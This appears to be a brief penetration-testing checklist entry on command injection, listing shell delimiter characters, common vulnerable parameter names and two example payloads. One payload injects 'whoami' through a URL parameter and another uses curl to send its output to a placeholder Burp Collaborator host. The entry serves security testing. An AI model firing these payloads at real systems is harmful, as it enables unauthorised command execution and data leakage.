V5 - Validation/Sanitization
Command Injection
POC
We can inject some special characters to see if the application blocks anything that could be used for command injection: - & - ; - Newline (0x0a or \n) - && - | - ||
In case the application doesn’t throw any error messages, we can try injecting our command after using one of these delimiters.
https://vulnerable-website/endpoint?parameter=1|whoami
Observe that the parameter parses the command you inject http://targetsite?id=blahblah;curl+$(whoami).xxxxx.burpcollaborator.net/
Note: This is a broad concept, above payload is just an example
The most common parameters that can be consider while testing for Command injection can be found below:
- cmd
- exec
- command
- execute
- ping
- query
- jump
- code
- reg
- do
- func
- arg
- option
- load
- process
- step
- read
- function
- req
- feature
- exe
- module
- payload
- run
Impact
High
Likelihood
High